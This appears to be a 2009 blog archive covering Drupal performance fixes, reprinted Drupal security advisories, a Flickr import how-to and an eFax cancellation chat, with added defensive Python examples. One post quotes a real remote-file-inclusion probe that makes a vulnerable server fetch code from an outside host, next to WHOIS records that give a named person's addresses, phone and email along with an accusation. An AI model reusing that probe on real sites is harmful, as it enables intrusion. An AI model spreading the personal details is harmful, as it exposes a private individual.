Friday, January 30, 2009

Cooling A Hot Drupal Install

We have had problems with the company site for a month now. It's an ongoing siege. What's worse: this is the only Drupal I have that is doing this. Here are some of Drupal's deadly sins playing out:
File stat frenzy: When in doubt, Drupal checks for modules and themes. It does a file system check by looking in certain file directories. We were really getting hung by this because I was being smart and using a theme with a stylesheet not named "style.css"-- this is what Drupal looks for in the themes to define that a theme is a theme. Also, I stored stuff in subdirectories in each of these themes (images and some other CSS files). That's a no-no. Whenever Drupal crawled the themes it would also crawl those subdirectories. There is an architectural problem we have (34 active themes) that is compounded by the two subdirectories per theme and the absence of a style.css. So, I nuked one of the subdirectories per theme, and I put in an empty style.css to placate the file check.
The modules directory is where we're putting all our modules. A number of developers recommend putting non-core modules into sites/all/modules. I don't hold for that-- so much so that I disabled the sites/all/modules crawl in file.inc. By default, it's one of the places to look for files. The file directory scan ignores ".", "..", and "CVS". Swell, but if you store stuff in Subversion, you may have .svn directories in your production copy. So, I added ".svn" as a directory to ignore when doing the crawl.
Group sessions: Sessions for us have gone totally mental. When Google, Yahoo or other sites crawl our site, each page view spawns a new session. The session expiry functionality is faulty, so these sessions pile up-- the sessions table grows and grows. Session tables in good installs look to have 2000-4000 sessions. Ours has 200,000 records on a good day: most are old, almost all of them are for anonymous users and most of them are shared by six or seven IP addresses. I have tried to prune these when I find the table has grown out of control. Good luck. Randy Brown has a good piece on how to change the settings.php file to make short session lifespans. I do not know if this will have a bearing. It hasn't appeared to work, which may point to some faulty session end functionality.
Content Types Gone Wild: When in doubt, we add fields and content types. We have over 500 fields in play. At first I thought I was being all smart: keep the number of fields under control for consistency. Hah. It turns out that the multi-table joins needed to farm in data elements are a killer: they can tie up two dozen tables. I put the question to people in the Drupal Groups and I have received a lot of great and productive feedback. Short answer: lots of individual fields is good. The exception: data you're going to pool (event dates, for example) should share a common field.
Tidying: I have been going through our themes and modules with an eye on two things: do we need the functionality, and do we need the module or the theme? When it's not required I take it out. I know that with the hundreds of modules available you can get into a pack-rat mindset of gathering modules, but I have to resist that-- I've even tossed Devel when not in active use: the idea is that I can re-install it when I need it.

The net result: the site is still driving into a wall. This means I get chiding comments about how Drupal is no good at running large sites. I counter that with Popsci.com: it's 10x busier than our site. I also counter it with Joyent's capacity to host VERY active sites. The problem: Joyent may be a little spazzy. Now we're doing Consulting full-time, all the time
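An added diagnostic for the session pile-up described above (example code written for this page, not part of the original post or of Drupal itself): it classifies rows shaped like Drupal's sessions table (sid, uid, hostname, timestamp), reports how much of the table is stale and anonymous and which hosts own those rows, and builds the DELETE that prunes only stale anonymous sessions so logged-in users are never touched. The rows, the fixed "now" and the one-day cut-off are constructed assumptions.

```python
from collections import Counter

DAY = 86400
NOW = 1233331200  # fixed "now" (30 Jan 2009 16:00 UTC) so the numbers are reproducible

# Constructed rows in the shape of Drupal's sessions table: (sid, uid, hostname, timestamp).
# uid 0 is an anonymous visitor; crawlers show up as many anonymous rows per host.
SAMPLE_SESSIONS = [
    ('a1', 17, '198.51.100.20', NOW - 600),          # logged-in user, fresh
    ('b2', 0, '203.0.113.5', NOW - 3 * DAY),         # crawler, three days old
    ('b3', 0, '203.0.113.5', NOW - 3 * DAY + 30),
    ('b4', 0, '203.0.113.5', NOW - 2 * DAY),
    ('c5', 0, '203.0.113.6', NOW - 40 * DAY),
    ('d6', 0, '198.51.100.77', NOW - 120),           # anonymous but fresh: keep it
    ('e7', 0, '203.0.113.6', NOW - 39 * DAY),
]


def session_report(rows, now=NOW, max_age=DAY):
    """Return (stats, sids_to_prune) for session rows.

    A row is stale once it is older than max_age; only stale *anonymous* rows are
    proposed for pruning, so a logged-in user never loses a live session.
    """
    stats = {'total': len(rows), 'anonymous': 0, 'stale': 0, 'stale_anonymous': 0}
    anon_by_host = Counter()
    prune = []
    for sid, uid, hostname, stamp in rows:
        stale = (now - stamp) > max_age
        if uid == 0:
            stats['anonymous'] += 1
            anon_by_host[hostname] += 1
        if stale:
            stats['stale'] += 1
        if stale and uid == 0:
            stats['stale_anonymous'] += 1
            prune.append(sid)
    # The handful of hosts that own most anonymous rows is usually the crawlers.
    stats['top_anonymous_hosts'] = anon_by_host.most_common(3)
    return stats, prune


def prune_sql(now=NOW, max_age=DAY):
    """The DELETE matching session_report's rule, for running by hand against the
    sessions table (column names as in Drupal 5/6)."""
    return 'DELETE FROM sessions WHERE uid = 0 AND timestamp < %d' % (now - max_age)


if __name__ == '__main__':
    stats, prune = session_report(SAMPLE_SESSIONS)
    print(stats)
    print('would prune', prune)
    print(prune_sql())
```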

Thursday, January 15, 2009

Are CB Marketing and Paypal Hell a bunch of botnet douchebags?

I found this great exploit attempt:

http://[poor site]/includes/config.php?cfg[path][phplib]=http://cbmarketer.com/images/t_pane.jpg/id.txt??


Making a vulnerable site go to http://cbmarketer.com/images/t_pane.jpg/ and download an id.txt file to get info on the server; then use spread.txt to suck down the crap used to sell an e-book via email to a bunch of poor characters out there.
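An added, defender-side example (written for this page, not the blog's own code): it runs a remote-file-inclusion check over constructed Apache combined-log lines in the shape of the probe above, flagging any query parameter whose value is itself an absolute URL and rating it by how many of the probe's tell-tales it carries. The client addresses and the example.invalid domain are made up.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed combined-format access-log lines. The first mirrors the shape of the
# probe quoted above (domain swapped for example.invalid); the others are benign.
SAMPLE_LOG = """\
203.0.113.7 - - [15/Jan/2009:03:12:44 -0800] "GET /includes/config.php?cfg[path][phplib]=http://example.invalid/images/t_pane.jpg/id.txt?? HTTP/1.1" 404 521 "-" "Mozilla/4.0"
198.51.100.3 - - [15/Jan/2009:03:13:01 -0800] "GET /node/42 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
198.51.100.9 - - [15/Jan/2009:03:13:07 -0800] "GET /search?q=http%3A%2F%2Fexample.com%2Fdocs HTTP/1.1" 200 3109 "-" "Mozilla/5.0"
"""

# client, ident, user, [time], "METHOD URI PROTO", status
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.I)
TEXT_OR_SCRIPT = re.compile(r'\.(?:txt|php|inc)$', re.I)


def classify_value(value):
    """Return the reasons a parameter value looks like an inclusion attempt, or []."""
    if not REMOTE_URL.match(value):
        return []
    reasons = ['parameter value is an absolute URL']
    if TEXT_OR_SCRIPT.search(urlsplit(value).path):
        reasons.append('remote path ends in a text/script file')
    if value.endswith('?'):
        reasons.append('trailing ? so anything the application appends is ignored')
    return reasons


def scan_log(text):
    """Parse each line, split its query string and report suspicious parameters.

    Severity is 'high' when more than one indicator is present; a lone URL-valued
    parameter (a search box, a referrer field) is reported as 'low' for triage.
    """
    findings = []
    for line in text.splitlines():
        match = LOG_LINE.match(line)
        if not match:
            continue
        client, uri, status = match.group(1), match.group(3), match.group(4)
        for name, value in parse_qsl(urlsplit(uri).query, keep_blank_values=True):
            reasons = classify_value(value)
            if reasons:
                findings.append({
                    'client': client, 'param': name, 'value': value,
                    'status': int(status), 'reasons': reasons,
                    'severity': 'high' if len(reasons) > 1 else 'low',
                })
    return findings


if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(hit['severity'], hit['client'], hit['param'], '->', hit['value'])
```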

Way to go, CBMarketer (aka Gary Pinson)

Registrant:
Gary Pinson
5201 FM 2088
Winnsboro, Texas 75494
United States

(also:
2126 E State Highway 154
Quitman, TX 75783-7190)


Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: CBMARKETER.COM
Created on: 23-Apr-06
Expires on: 23-Apr-09
Last Updated on: 23-Apr-08

Administrative Contact:
Pinson, Gary GPinson@PromoteLink.com
5201 FM 2088
Winnsboro, Texas 75494
United States
(903) 629-7112 Fax -- (903) 342-3326

Technical Contact:
Pinson, Gary GPinson@PromoteLink.com
5201 FM 2088
Winnsboro, Texas 75494
United States
(903) 629-7112 Fax -- (903) 342-3326

Domain servers in listed order:
NS1.MY-WEBSPACE.BIZ
NS2.MY-WEBSPACE.BIZ

[Security announcements] SA-CONTRIB-2009-004 - Notify - Privilege escalation

---- SA-CONTRIB-2009-004 - NOTIFY - PRIVILEGE ESCALATION ----

* Advisory ID: DRUPAL-SA-CONTRIB-2009-004

* Project: Notify

* Versions: 5.x

* Date: 2009-January-15

* Security risk: Moderately critical

* Exploitable from: Remote

* Vulnerability: Privilege escalation

---- DESCRIPTION ----

A user triggering the cron processing of the Notify module may end up getting
logged in as another user when the Notify operations do not complete
successfully.

---- VERSIONS AFFECTED ----

* Versions of Notify for Drupal 5.x prior to 5.x-1.2

Drupal core is not affected. If you do not use the Notify module, there is
nothing you need to do.

---- SOLUTION ----

Install the latest version.

* If you use Notify for Drupal 5.x upgrade to 5.x-1.2 [
http://drupal.org/node/358495 ]

Also see the Notify project page [ http://drupal.org/project/notify ].

---- REPORTED BY ----

Philippe Jadin and Bill Kennedy

---- CONTACT ----

The security contact for Drupal can be reached at security at drupal.org or via
the form at [ http://drupal.org/contact ] and by selecting the security issues
category.

--
Unsubscribe from this newsletter: http://drupal.org/newsletter/confirm/remove/73ff60b93f11343t44

Wednesday, January 14, 2009

[Security announcements] SA-CORE-2009-001 Drupal core - Multiple vulnerabilities

---- SA-CORE-2009-001 DRUPAL CORE - MULTIPLE VULNERABILITIES ----

* Advisory ID: DRUPAL-SA-CORE-2009-001

* Project: Drupal core

* Versions: 5.x and 6.x

* Date: 2009-January-14

* Security risk: Moderately Critical

* Exploitable from: Remote

* Vulnerability: Multiple vulnerabilities

Multiple vulnerabilities and weaknesses were discovered in Drupal.

---- ACCESS BYPASS ----

The Content Translation module for Drupal 6.x enables users to make a
translation of an existing item of content (a node). In that process the
existing node's content is copied into the new node's submission form.

The module contains a flaw that allows a user with the 'translate content'
permission to potentially bypass normal viewing access restrictions, for example
allowing the user to see the content of unpublished nodes even if they do not
have permission to view unpublished nodes.

This issue only affects Drupal 6.x.

---- VALIDATION BYPASS ----

When user profile pictures are enabled, the default user profile validation
function will be bypassed, possibly allowing invalid user names or e-mail
addresses to be submitted.

This issue only affects Drupal 6.x.

---- HARDENING AGAINST SQL INJECTION ----

A parameter passed into the node access API was not properly escaped or
validated before being used in SQL queries. While there is no direct risk of
SQL injection from Drupal core, it's possible that this could have presented a
risk in combination with a contributed module. Additional validation has been
added to eliminate this risk.

This issue affects both Drupal 5.x and Drupal 6.x.

---- VERSIONS AFFECTED ----

* Drupal 5.x before version 5.15.

* Drupal 6.x before version 6.9.

---- SOLUTION ----

Install the latest version:

* If you are running Drupal 5.x then upgrade to Drupal 5.15 [
http://ftp.drupal.org/files/projects/drupal-5.15.tar.gz ].

* If you are running Drupal 6.x then upgrade to Drupal 6.9 [
http://ftp.drupal.org/files/projects/drupal-6.9.tar.gz ].

If you are unable to upgrade immediately, you can apply a patch to secure your
installation until you are able to do a proper upgrade. The patches fix security
vulnerabilities, but do not contain other fixes which were released in these
versions.

* To patch Drupal 5.14 use SA-CORE-2009-001-5.14.patch [
http://drupal.org/files/sa-core-2009-001/SA-CORE-2009-001-5.14.patch ].

* To patch Drupal 6.8 use SA-CORE-2009-001-6.8.patch [
http://drupal.org/files/sa-core-2009-001/SA-CORE-2009-001-6.8.patch ].

---- REPORTED BY ----

The access bypass issue for translations was reported by Wolfgang Ziegler [
http://drupal.org/user/16747 ].

The validation bypass was reported by v1nce [ http://drupal.org/user/52144 ],
supersmashbrothers [ http://drupal.org/user/241667 ], Tejus Pratap [
http://drupal.org/user/360600 ], and Limiting Factor [
http://drupal.org/user/373498 ].

The need for SQL hardening was reported by Derek Wright [
http://drupal.org/user/46549 ] of the Drupal Security Team.

---- CONTACT ----

The security team for Drupal can be reached at security at drupal.org or via
the form at [ http://drupal.org/contact ].


[Security announcements] SA-CONTRIB-2009-003 - Internationalization (i18n) Translation module - Access bypass

---- SA-CONTRIB-2009-003 - INTERNATIONALIZATION (I18N) TRANSLATION MODULE -
ACCESS BYPASS ----

* Advisory ID: DRUPAL-SA-CONTRIB-2009-003

* Project: Internationalization (i18n) (third-party module)

* Version: 5.x-2.x

* Date: 2009-January-14

* Security risk: Less critical

* Exploitable from: Remote

* Vulnerability: Access bypass

---- DESCRIPTION ----

The third-party i18n module enables users to make a translation of an existing
item of content (a node). In that process the existing node's content is copied
into the new node.

The module contains a flaw that allows a user with the 'translate node'
permission to potentially bypass normal viewing access restrictions, for example
allowing the user to see the content of unpublished nodes even if they do not
have permission to view unpublished nodes.

---- VERSIONS AFFECTED ----

* All 5.x versions of Internationalization (i18n) prior to 5.x-2.5.

Drupal core is not affected. If you do not use the contributed
Internationalization (i18n) module, there is nothing you need to do.

---- SOLUTION ----

Install the latest version:

* If you use 5.x-2.x upgrade to Internationalization 5.x-2.5 [
http://drupal.org/node/358986 ].

See also the Internationalization project page [ http://drupal.org/project/i18n
].

---- REPORTED BY ----

Wolfgang Ziegler [ http://drupal.org/user/16747 ] and by Nat Catchpole [
http://drupal.org/user/35733 ] of the Drupal security team.

---- CONTACT ----

The security contact for Drupal can be reached at security at drupal.org or via
the form at [ http://drupal.org/contact ].


Thursday, January 08, 2009

How to hook Flickr to your site via Drupal

I have a Flickr account, a personal site, a lot of sad geeky experience with Drupal and a passion for tapping into APIs where I find them. Also, I wouldn't mind monetizing what I am doing. The Flickr module for Drupal is good, but I wanted to take these images and include them on my own site as nodes. Also, I wanted a process that would automatically grab images rather than making me cut and paste images into my site. Beyond this, I wanted to leave this concept open enough that I could pop in media from other sources (like YouTube). This is how to combine these elements into a whole, and this may help you if you want to do the same thing.

There are some things you have to go out there and find (and some I include below):
You need to build a content type to support holding and displaying these pieces of gathered content. I built a content-type, Media, to hold a rendered copy of the image and some supporting information. The view of the page is pre-built by my node-save process. I have added a source field to hold a reference to the image; this will be checked when data is imported via the API so that you don't import multiple copies of the same image. To make this easier, I have used the Import/Export capacity to make a copy of the CCK content-type that you can import into your site.

There are TONNES of elements available from the Flickr API. In my example, I grabbed the basics of the image and then I went back and grabbed the "exif" data for these images. The Exif has the potential to hold all of your camera's data: model, resolution, palette information. In my case, I am sniffing out the model information and I have added a field called "ware" in the Media type to hold the hardware and software used to create my images. I have a product search tool tied into Shopping.com. I take this model information, stored in the "ware" field and I used it to make linkage to the shopping.com tie-in.

Next, I built a node template for this content type. It formats the node and organizes its data. What it also does is make the linkage to the Product Search page using the ware field.

What you can do with this content-type is build a view to display the nodes. I have an export of that node: View. The view can be used as a standalone page; or use a block in a panel or another part of your layout.

How do you get your data from the API? You can build a standalone page with a bootstrap include. Or, you could build a whole module around this action. Personally, I prefer to keep my module count as low as I can get away with-- too many modules and you have a huge weight to pack around when loading pages. In my case, I went the easiest route possible: I made a page and added a qualifier so that the import functionality is not easily called. If it is called additional times, the source field should save your bacon-- it will compare the images you already have vs. those seen from the API data. When you execute this code, calling media_node_flickr() will spawn the API call, the duplication check and the node saving.

You can take the code and build on it-- add new fields to the content type, add functionality, mine the API for more information.
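A sketch of the import step above as an added example (not the post's own media_node_flickr() code, and in Python rather than Drupal's PHP): it takes responses in the shape of Flickr's getPublicPhotos and getExif calls, skips photos whose source URL is already stored in a Media node, and derives the "ware" field from the EXIF Make/Model/Software tags. The photo data is constructed, the JSON shapes are assumptions about the API, and the actual node_save is left to Drupal.

```python
import json

# Constructed in the shape of flickr.people.getPublicPhotos (format=json): two photos,
# one of which is already on the site. Ids, secrets and servers are made up.
SAMPLE_PHOTOS = json.loads('''{"photos": {"photo": [
  {"id": "3190000001", "secret": "a1b2c3", "server": "3101", "farm": 4, "title": "Harbour at dusk"},
  {"id": "3190000002", "secret": "d4e5f6", "server": "3077", "farm": 4, "title": "Old ferry"}
]}, "stat": "ok"}''')

# Constructed in the shape of flickr.photos.getExif (format=json), keyed by photo id.
SAMPLE_EXIF = {
    '3190000002': json.loads('''{"photo": {"id": "3190000002", "exif": [
      {"tagspace": "IFD0", "tag": "Make", "label": "Make", "raw": {"_content": "Canon"}},
      {"tagspace": "IFD0", "tag": "Model", "label": "Model", "raw": {"_content": "Canon EOS 5D"}},
      {"tagspace": "IFD0", "tag": "Software", "label": "Software", "raw": {"_content": "Adobe Photoshop CS3"}},
      {"tagspace": "ExifIFD", "tag": "ISO", "label": "ISO Speed", "raw": {"_content": "200"}}
    ]}, "stat": "ok"}'''),
}


def source_url(photo):
    """The static image URL Flickr serves for a photo; this is what the Media
    type's source field stores and what the duplicate check compares."""
    return 'http://farm%s.static.flickr.com/%s/%s_%s.jpg' % (
        photo['farm'], photo['server'], photo['id'], photo['secret'])


def ware_from_exif(exif_response):
    """Collapse the EXIF tag list into the 'ware' field: model (or make) plus software."""
    tags = {item['tag']: item['raw']['_content'] for item in exif_response['photo']['exif']}
    hardware = tags.get('Model') or tags.get('Make') or ''
    software = tags.get('Software', '')
    return '; '.join(part for part in (hardware, software) if part)


def media_nodes_from_flickr(photos_response, existing_sources, exif_lookup):
    """Build the Media node records for photos not yet on the site.

    existing_sources: set of source URLs already stored in Media nodes.
    exif_lookup: callable photo_id -> getExif response (a dict lookup here; in
    the real import this is the second API call).
    """
    nodes = []
    for photo in photos_response['photos']['photo']:
        src = source_url(photo)
        if src in existing_sources:      # duplicate check on the source field
            continue
        exif = exif_lookup(photo['id'])
        nodes.append({
            'title': photo['title'],
            'source': src,
            'ware': ware_from_exif(exif) if exif else '',
        })
        existing_sources.add(src)        # so a repeat within the same run is caught too
    return nodes


if __name__ == '__main__':
    already = {source_url(SAMPLE_PHOTOS['photos']['photo'][0])}
    for node in media_nodes_from_flickr(SAMPLE_PHOTOS, already, SAMPLE_EXIF.get):
        print(node)
```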

Wednesday, January 07, 2009

[Security announcements] SA-CONTRIB-2009-002 - Project issue tracking - Multiple vulnerabilities

---- SA-CONTRIB-2009-002 - PROJECT ISSUE TRACKING - MULTIPLE VULNERABILITIES
----

* Advisory ID: DRUPAL-SA-CONTRIB-2009-002

* Project: Project issue tracking (third-party module)

* Version: 5.x-2.x

* Date: 2009-January-07

* Security risk: Moderately critical

* Exploitable from: Remote

* Vulnerability: Node access bypass, Cross-site scripting (XSS)

---- DESCRIPTION ----

This announcement covers the following two issues for the Project issue
tracking module [ http://drupal.org/project/project_issue ].

* Under certain conditions, users may receive email updates for issues which
they do not have proper access rights to. This issue is mainly a problem for
sites that use a contributed node access module, although it also affects issues
that have been unpublished.

* Malicious users with the "administer projects" permission are able to
inject arbitrary code when adding or editing issue status values. This is only
an issue if you need any role separation between administrators and users with
the "administer projects" permission.

Wikipedia has more information about cross site scripting [
http://en.wikipedia.org/wiki/Cross-site_scripting ] (XSS).

---- VERSIONS AFFECTED ----

* Project issue tracking (project_issue) for Drupal 5.x prior to 5.x-2.3

Drupal core is not affected. If you do not use the contributed Project issue
tracking module, there is nothing you need to do.

---- SOLUTION ----

Install the latest version:

* Project issue tracking 5.x-2.3 [ http://drupal.org/node/355709 ]

See also the Project issue tracking project page [
http://drupal.org/project/project_issue ].

---- REPORTED BY ----

* The access bypass vulnerability was reported by Damien Tournoud [
http://drupal.org/user/22211 ] of the Drupal Security team [
http://drupal.org/security-team ].

* The cross site scripting vulnerability was reported by Derek Wright (dww [
http://drupal.org/user/46549 ]) of the Drupal Security team [
http://drupal.org/security-team ].

---- CONTACT ----

The security contact for Drupal can be reached at security at drupal.org or via
the form at [ http://drupal.org/contact ].


[Security announcements] SA-CONTRIB-2009-001 - Project release - Multiple vulnerabilities

---- SA-CONTRIB-2009-001 - PROJECT RELEASE - MULTIPLE VULNERABILITIES ----

* Advisory ID: DRUPAL-SA-CONTRIB-2009-001

* Project: Project release (third-party module)

* Version: 5.x

* Date: 2009-January-07

* Security risk: Highly critical

* Exploitable from: Remote

* Vulnerabilities: Arbitrary file upload, Cross-site scripting (XSS)

---- DESCRIPTION ----

The Project release module is a component within the broader Project [
http://drupal.org/project/project ] module. This announcement covers the
following two issues:

* Project release enables file attachments to create a specific version of
code to be downloaded by users. This module uses its own code to upload files so
the files are not validated by Drupal core's Upload module. The lack of
validation in Project release's upload mechanism enables a user with the
"maintain projects" permission to upload files with arbitrary extensions. Using
these files an attacker can perform cross site scripting attacks, and depending
on the server configuration, may also be able to execute arbitrary code.

Any projects that are associated with a CVS repository using the CVS
integration [ http://drupal.org/project/cvslog ] module are not vulnerable,
though you are still encouraged to upgrade.

Important Note

The steps above will stop malicious files from being uploaded, but will do
nothing to protect your site against files that have already been uploaded. Make
sure to carefully inspect the file system path and check for files with
extensions that should be forbidden. We recommend you remove any HTML file you
did not upload yourself. You should look for script tags, CSS includes,
Javascript includes, and onerror="" attributes if you need to review files
individually.

* The Project release module allows users to create releases of a project
which are then available for download. Users may be able to inject arbitrary
code on error pages produced by the Project release module by using a malformed
URL.

Wikipedia has more information about cross site scripting [
http://en.wikipedia.org/wiki/Cross-site_scripting ] (XSS).

---- VERSIONS AFFECTED ----

* Project for Drupal 5.x prior to 5.x-1.3

Drupal core is not affected. If you do not use the contributed Project release
module, there is nothing you need to do.

---- SOLUTION ----

Install the latest version:

* Project 5.x-1.3 [ http://drupal.org/node/355708 ]

See also the Project module project page [ http://drupal.org/project/project ].


---- REPORTED BY ----

Both vulnerabilities were reported by Adam Light (aclight [
http://drupal.org/user/86358 ]) of the Drupal Security team [
http://drupal.org/security-team ].

---- CONTACT ----

The security contact for Drupal can be reached at security at drupal.org or via
the form at [ http://drupal.org/contact ].
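An added example of the review the advisory's Important Note asks for (written for this page, not the Drupal security team's code): it walks a files directory, flags anything whose extension is off an allow-list or that hides a scripting extension before the last dot, and greps each file for the markers the note names (script tags, CSS and JavaScript includes, onerror attributes). The allow-list, the dangerous-extension list and the sample files are constructed assumptions.

```python
import os
import re

# Extensions that are safe to serve as-is from a Drupal files directory (an
# assumption for this example, not the advisory's own list); anything else, or
# anything with a scripting extension hidden before the last dot, gets flagged.
ALLOWED_EXTENSIONS = {'jpg', 'jpeg', 'gif', 'png', 'txt', 'pdf', 'zip', 'tar', 'gz', 'tgz', 'diff', 'patch'}
DANGEROUS_EXTENSIONS = {'php', 'phtml', 'php3', 'php4', 'php5', 'pl', 'py', 'cgi', 'html', 'htm', 'shtml', 'js'}

# The markers the advisory says to look for when reviewing files individually.
MARKERS = {
    'script tag': re.compile(rb'<\s*script\b', re.I),
    'CSS include': re.compile(rb'<\s*link\b[^>]*stylesheet|@import\b', re.I),
    'JavaScript include': re.compile(rb'<\s*script\b[^>]*\bsrc\s*=', re.I),
    'onerror attribute': re.compile(rb'\bonerror\s*=', re.I),
}


def audit_file(path, content):
    """Return the reasons a file should be reviewed by hand ([] means nothing found)."""
    reasons = []
    parts = os.path.basename(path).lower().split('.')
    exts = parts[1:]                      # 'a.php.txt' -> ['php', 'txt']
    last = exts[-1] if exts else ''
    if last not in ALLOWED_EXTENSIONS:
        reasons.append('extension .%s not in allow-list' % (last or '(none)'))
    hidden = [e for e in exts[:-1] if e in DANGEROUS_EXTENSIONS]
    if hidden:
        reasons.append('dangerous inner extension .' + '.'.join(hidden))
    for label, pattern in MARKERS.items():
        if pattern.search(content):
            reasons.append('contains ' + label)
    return reasons


def audit_tree(root, max_bytes=1 << 20):
    """Walk a files directory and map each suspicious path to its reasons."""
    findings = {}
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            with open(full, 'rb') as handle:
                reasons = audit_file(full, handle.read(max_bytes))
            if reasons:
                findings[full] = reasons
    return findings


if __name__ == '__main__':
    import tempfile
    # Constructed files: a genuine-looking tarball name, a stray HTML page, a double extension.
    with tempfile.TemporaryDirectory() as root:
        samples = {
            'release-1.0.tar.gz': b'\x1f\x8b not really a tarball',
            'notes.html': b'<p>hi</p><img src=x onerror="alert(1)">',
            'helper.php.txt': b'<?php echo "hidden"; ?>',
        }
        for name, body in samples.items():
            with open(os.path.join(root, name), 'wb') as handle:
                handle.write(body)
        for path, reasons in sorted(audit_tree(root).items()):
            print(os.path.basename(path), '->', '; '.join(reasons))
```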

Friday, January 02, 2009

Efax or Ef*cks? Easy to Join. Impossible to leave

I wanted to discontinue my eFax account. I used it three times at $15/month. It was easy sign-up but impossible to leave. Their website suggests calling a number that vaguely looks like a UK number. I tried the US office and called that. The automated system suggested that I go to www.efax.com/cancel. So, I did. That spawned a chat session. The cancellation process was couched as a "review of my request"-- like they could turn down my request to stop using their services? Then I got into a long chat where they tried to keep my account open-- just in case--

Welcome to chat.
The session has been accepted.
{Frank D.} Hello, Mike. Welcome to j2 Global's online support. I am Frank, your Online Live Support Representative. How are you doing today?
{Mike DeWolfe} I am cancelling my eFax account: eFax Number:
1-2X0-483-6X4X
effective as of now. I will put in a note to my credit card company to refuse charges from eFax
{Frank D.} You can have it cancel via this chat session anytime you wish to. Do you wish to discontinue your service today?
{Mike DeWolfe} I wish to discontinue the service today
{Frank D.} I'm sorry to hear that you wish to cancel. Could you please provide me your PIN for verification?
{Mike DeWolfe} XXXXXX
{Frank D.} Thank you for providing your information. Please give me a moment while I go through your records. In the meantime, please type the number corresponding to your reason for cancellation:

1) Moving to another provider
2) Bought a fax machine
3) Business or role changed
4) Short term project completed
5) Financial reasons
6) Problems with faxing or billing
7) Dissatisfied with quality of service
8) Too costly
{Mike DeWolfe} 4) Short term project completed
{Frank D.} Thank you for waiting. I have located and verified your account in our records.
{Frank D.} Mike, I understand that currently you do not need the service. In the current situation, we will waive off the monthly fee for two months. This way you will be able to keep your account, which will enable you to send and receive faxes. You will also be able to use all of our services and re-evaluate it for your faxing needs. Only usage charges are applicable for sending faxes if any. During this period, you will not be charged any monthly fee. We are suggesting this so that you can give it a second thought, as you will not be paying CAD$14.99 for the next 2 billing cycles.
{Frank D.} Your eFax account will be credited with CAD$29.98 so that you may utilize our services without being billed our monthly fee for the next two billing cycles.
{Frank D.} Since you will not be charged any monthly fee for the next two months you could keep the number till then. If at all you find that you need our services during this period, then you will still have the account. If however, you still feel that you do not have any use for our services by the end of this two months credit period, then you can always contact us back anytime. Would that be preferable?
{Mike DeWolfe} Thank you-- I do want to cancel my account, effective as of now. I will put in a note to my credit card company to refuse charges from eFax
{Frank D.} Just to confirm. Do you wish to avail the above offer?
{Mike DeWolfe} I do not. I do want to cancel my account, effective as of now.
{Frank D.} Mike, I completely understand your wish to discontinue, since you have paid for the current month, you can retain this number at least till the end of two months credit offer as you will not be charged any monthly fee for the two months. If however, you still feel that you do not have any use for our services by the end of the two months credit period, then you can always contact us back anytime.
{Frank D.} As a good will gesture, we will offer you an additional gift balance of $10 along with the monthly credit, which will enable to send up to 100 additional fax pages free of cost (per page per minute within US & Canada).
{Frank D.} At the end of the 2 months credit period, you can get back to us immediately without any further obligation to stay back. We are available 24 hours a day and 7 days a week. Please feel free to contact us at any time. We will immediately process your request.
{Mike DeWolfe} Thank you.
{Frank D.} That's Great.
{Frank D.} I am sure that you will have a great experience with eFax & your account will remain open until we hear from you. Only usage charges are applicable for sending faxes if any.
{Frank D.} Is there anything else I can assist you with at this time?
{Mike DeWolfe} I WANT TO CLOSE MY ACCOUNT. Please do that immediately.
{Frank D.} All right, as per your wish, I will close your account right now. We are sorry that you have decided to leave eFax, we are continuously improving our products and services but if your faxing needs do change in the future, we would be more than happy to have you back. Please do consider us if your faxing needs change in the future. Thank you for being with us and for using our service.
{Frank D.} Is there anything else I can assist you with at this time?
{Mike DeWolfe} No, I have contacted my credit card company and they will return any future charges from eFax, J2, etc. So, we're good.